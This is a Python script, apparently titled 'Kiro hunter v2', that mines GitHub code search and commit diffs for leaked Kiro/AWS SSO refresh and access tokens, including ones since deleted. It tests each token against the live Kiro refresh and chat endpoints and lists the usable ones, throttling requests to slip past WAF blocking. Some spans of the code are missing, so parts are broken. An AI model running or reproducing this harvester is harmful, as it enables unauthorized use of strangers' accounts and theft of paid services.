#!/usr/bin/env python3 """Kiro hunter v2 — correct token format + commit-history scan. Real Kiro tokens are NOT JWTs. They're opaque AWS-blessed strings: accessToken: aoaAAAAA... (base64, contains '+' '/' and sometimes ':') refreshToken: aorAAAAA... (~180 chars) Found in files named kiro-auth-token*.json, ~/.aws/sso/cache/*.json, or in KIRO_AUTH_TOKEN JSON arrays / KIRO_REFRESH_TOKEN env vars. Pipeline: 1. GitHub code search for files named kiro-auth-token / .aws/sso/cache kiro, plus the aoaAAAAA/aorAAAAA token prefixes. 2. Fetch raw content (HEAD) and extract access/refresh tokens. 3. Commit-history scan: for repos that touched kiro-auth-token files, walk recent commits and grep the patch for aorAAAAA tokens (catches deleted ones). 4. Verify each refresh token via prod.us-east-1.auth.desktop.kiro.dev/refreshToken. 200+accessToken = USABLE (then optional chat probe); 401 = DEAD; else kept. GitHub and the kiro.dev refresh endpoint are GFW-blocked; all traffic routes via GH_PROXY (a CN proxy known to reach both). Outputs results/kiro2/{usable,no_balance,no_access,unknown,dead,all_non_401}.txt """ import argparse, base64, json, os, re, subprocess, sys, time, uuid import urllib.request, urllib.error, urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from pathlib import Path HERE = Path(__file__).parent RESULTS = HERE / "results" / "kiro2" RESULTS.mkdir(parents=True, exist_ok=True) GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389") REFRESH_URL = "https://prod.us-east-1.auth.desktop.kiro.dev/refreshToken" CHAT_URL = "https://q.us-east-1.amazonaws.com/generateAssistantResponse" UA = "curl/8.5.0" # Min seconds between refresh-endpoint posts. Too aggressive and CloudFront WAF # 403-blocks the whole IP for several minutes. VERIFY_DELAY = float(os.environ.get("KIRO_VERIFY_DELAY", "0.4")) # Real token prefixes. Allow base64 alphabet including + and /. ACCESS_RE = re.compile(r"aoaAAAAA[A-Za-z0-9+/=_:\-]{40,}") REFRESH_RE = re.compile(r"aorAAAAA[A-Za-z0-9+/=_:\-]{40,}") QUERIES = [ "filename:kiro-auth-token", "kiro-auth-token.json", "kiro-auth-token extension:json", '"aorAAAAA"', '"aoaAAAAA"', '"accessToken" "refreshToken" "kiro" extension:json', '"refreshToken" "aorAAAAA"', '"clientIdHash" "refreshToken" extension:json', '"profileArn" "refreshToken" "kiro"', '"authMethod" "refreshToken" "kiro" extension:json', 'KIRO_REFRESH_TOKEN=aor', 'KIRO_AUTH_TOKEN aorAAAAA', '"prod.us-east-1.auth.desktop.kiro.dev" "refreshToken"', "kiro sso cache extension:json", '"kiro" "aorAAAAA"', '"codewhisperer" "refreshToken" extension:json', ] _opener = None def opener(): global _opener if _opener is None: h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}) if GH_PROXY else urllib.request.ProxyHandler({}) _opener = urllib.request.build_opener(h) return _opener _direct = None def direct_opener(): """Opener that bypasses GH_PROXY. The CN proxy returns CloudFront 403 for the Kiro refresh/chat endpoints, but they are directly reachable from this host.""" global _direct if _direct is None: _direct = urllib.request.build_opener(urllib.request.ProxyHandler({})) return _direct def github_token(): t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN") if t: return t try: o = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10) if o.returncode==0: return o.stdout.strip() except FileNotFoundError: pass p = Path.home()/".config/gh/hosts.yml" if p.exists(): for line in p.read_text().splitlines(): if line.strip().startswith("oauth_token:"): return line.split(":",1)[1].strip() return None def gh_get(url, token, timeout=30): headers = {"Accept":"application/vnd.github+json","User-Agent":"kiro-hunter"} if token: headers["Authorization"]=f"Bearer {token}" req = urllib.request.Request(url, headers=headers) try: with opener().open(req, timeout=timeout) as r: return r.getcode(), r.read().decode("utf-8","replace"), dict(r.headers) except urllib.error.HTTPError as e: try: body=e.read().decode("utf-8","replace") except Exception: body="" return e.code, body, dict(e.headers or {}) except Exception as e: return 0, f"net:{e}", {} def search_code(query, token, per_page=100): for page in range(1,11): url=("https://api.github.com/search/code" f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}") code,body,hdrs = gh_get(url,token) if code==200: try: data=json.loads(body) except Exception: return items=data.get("items",[]) for it in items: yield it if len(items) {access, source_hint} for m in REFRESH_RE.findall(content): rt = clean(m) # Real Kiro refresh tokens are opaque base64 ~180-260 chars. Reject # binary/garbage runs that merely start with "aorAAAAA" (these produce # multi-KB blobs and trigger AWS WAF 403 on the refresh endpoint). if 120 <= len(rt) <= 400: out.setdefault(rt, {}) for m in ACCESS_RE.findall(content): at = clean(m) if 120 <= len(at) <= 2000: for rt in out: out[rt].setdefault("access", at) return out def list_file_commits(repo, path, token, max_commits=15): """List commits that touched a specific file (bounded). Much cheaper than walking a whole repo's history.""" q=urllib.parse.quote(path, safe="") url=f"https://api.github.com/repos/{repo}/commits?path={q}&per_page={max_commits}&page=1" code,body,hdrs=gh_get(url,token,timeout=15) if code in (403,429): reset=hdrs.get("X-RateLimit-Reset") wait=min(max(int(reset)-int(time.time()),5), 60) if reset else 20 time.sleep(wait+1) code,body,_=gh_get(url,token,timeout=15) if code!=200: return try: data=json.loads(body) except Exception: return if not isinstance(data,list): return for c in data: sha=c.get("sha") if sha: yield sha def commit_patch(repo, sha, token): """Return the patch text for a commit (the diff).""" url=f"https://api.github.com/repos/{repo}/commits/{sha}" headers={"Accept":"application/vnd.github.v3.diff","User-Agent":"kiro-hunter"} if token: headers["Authorization"]=f"Bearer {token}" req=urllib.request.Request(url,headers=headers) try: with opener().open(req,timeout=20) as r: return r.read().decode("utf-8","replace") except Exception: return "" def scan_repo_commits(repo, paths, token, max_commits): """Scan commits touching specific files in one repo; return {rt: source}.""" found={} seen=set() for path in paths: try: shas=list(list_file_commits(repo,path,token,max_commits=max_commits)) except Exception: continue for sha in shas: if sha in seen: continue seen.add(sha) patch=commit_patch(repo,sha,token) if "aorAAAAA" not in patch: continue for rt in extract(patch): found[rt]=f"{repo}@{sha[:10]} (commit diff)" return found def http_post(url, body, headers, timeout=30): h={"User-Agent":UA,"Accept":"*/*","Content-Type":"application/json",**headers} data=json.dumps(body).encode() req=urllib.request.Request(url,data=data,headers=h,method="POST") op = direct_opener() if "kiro.dev" in url or "amazonaws.com" in url else opener() try: with op.open(req,timeout=timeout) as r: return r.getcode(), r.read().decode("utf-8","replace") except urllib.error.HTTPError as e: try: return e.code, e.read().decode("utf-8","replace") except Exception: return e.code, "" except Exception as e: return 0, f"net:{type(e).__name__}:{e}" def verify_rt(rt, do_chat=False): # CloudFront WAF occasionally returns a 403 HTML "Request blocked" when we # fire too fast. Retry with backoff so a transient block doesn't permanently # misclassify a token as NO_ACCESS. import threading as _t global _verify_lock, _last_post try: _verify_lock except NameError: _verify_lock=_t.Lock(); _last_post=0.0 code=body=None for attempt in range(4): with _verify_lock: gap=time.time()-_last_post if gap source if args.verify_only: ef=RESULTS/"refresh_tokens.txt" if ef.exists(): for line in ef.read_text().splitlines(): if "|" in line: rt,src=line.split("|",1) rts[rt]=src print(f"verify-only: {len(rts)} tokens",flush=True) else: print("\n=== Stage 1: code search ===",flush=True) files={} for i,q in enumerate(QUERIES,1): print(f" [{i:2d}/{len(QUERIES)}] {q}",flush=True) try: for it in search_code(q,token): u=it.get("html_url","") if u: files[u]=it.get("repository",{}).get("full_name","?") except Exception as e: print(" err",e,file=sys.stderr) print(f" candidate files: {len(files)}",flush=True) # extract from HEAD raw print("\n=== Stage 2a: HEAD raw extraction ===",flush=True) done=0 repo_paths={} # repo -> set(paths) with ThreadPoolExecutor(max_workers=20) as pool: futs={pool.submit(fetch_raw,to_raw(u)):(u,repo) for u,repo in files.items()} for f in as_completed(futs): u,repo=futs[f]; done+=1 # derive file path from html url: https://github.com/{repo}/blob/{branch}/{path} try: parts=u.split("/blob/",1) if len(parts)==2: path=parts[1].split("/",1)[1] # drop ref repo_paths.setdefault(repo,set()).add(path) except Exception: pass try: content=f.result() except Exception: content="" for rt in extract(content): rts.setdefault(rt,u) if done%200==0: print(f" {done}/{len(files)} tokens={len(rts)}",flush=True) nfiles=sum(len(v) for v in repo_paths.values()) print(f" after HEAD: {len(rts)} refresh tokens; {len(repo_paths)} repos, {nfiles} tracked files",flush=True) # durable checkpoint of HEAD tokens before the slow commit scan with open(RESULTS/"refresh_tokens.txt","w") as f: for rt,src in sorted(rts.items()): f.write(f"{rt}|{src}\n") if args.scan_commits: print(f"\n=== Stage 2b: per-file commit-history scan (max {args.commit_pages} commits/file, {args.commit_workers} workers) ===",flush=True) repo_list=sorted(repo_paths) scanned=0; lock=__import__("threading").Lock() def _job(repo): return repo, scan_repo_commits(repo,repo_paths[repo],token,args.commit_pages) with ThreadPoolExecutor(max_workers=args.commit_workers) as pool: futs={pool.submit(_job,repo):repo for repo in repo_list} for f in as_completed(futs): repo=futs[f]; scanned+=1 try: _,found=f.result() except Exception: found={} new=0 if found: with lock: before=len(rts) for rt,src in found.items(): rts.setdefault(rt,src) new=len(rts)-before if new: print(f" [{scanned}/{len(repo_list)}] {repo}: +{new} (total {len(rts)})",flush=True) if scanned%25==0: print(f" scanned {scanned}/{len(repo_list)} repos, tokens={len(rts)}",flush=True) with open(RESULTS/"refresh_tokens.txt","w") as f: for rt,src in sorted(rts.items()): f.write(f"{rt}|{src}\n") with open(RESULTS/"refresh_tokens.txt","w") as f: for rt,src in sorted(rts.items()): f.write(f"{rt}|{src}\n") print(f" saved {len(rts)} tokens -> refresh_tokens.txt",flush=True) print(f"\n=== Stage 3: verify {len(rts)} refresh tokens (workers={args.workers}) ===",flush=True) buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]} start=time.time(); done=0 with ThreadPoolExecutor(max_workers=args.workers) as pool: futs={pool.submit(verify_rt,rt,args.chat):(rt,src) for rt,src in rts.items()} for f in as_completed(futs): rt,src=futs[f]; done+=1 try: v,detail,access=f.result() except Exception as e: v,detail,access="UNKNOWN",f"exc:{e}",None buckets[v].append((rt,src,access,detail)) if done%10==0: el=time.time()-start print(f" [{done:4d}/{len(rts)}] "+" ".join(f"{k.lower()}={len(buckets[k])}" for k in buckets)+f" ({done/el:.1f}/s)",flush=True) for name,items in buckets.items(): with open(RESULTS/f"{name.lower()}.txt","w") as f: for rt,src,access,detail in items: f.write(f"{rt}|{src}|access={access or ''}|{detail}\n") print(f" {name:11s}: {len(items):4d}",flush=True) with open(RESULTS/"all_non_401.txt","w") as f: for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"): for rt,src,access,detail in buckets[name]: f.write(f"{name}|{rt}|{src}|access={access or ''}|{detail}\n") if buckets["USABLE"]: print("\n=== USABLE KIRO TOKENS ===",flush=True) for rt,src,access,detail in buckets["USABLE"]: print(f" refresh: {rt[:45]}...{rt[-8:]}\n src: {src}\n {detail}\n",flush=True) if __name__=="__main__": main()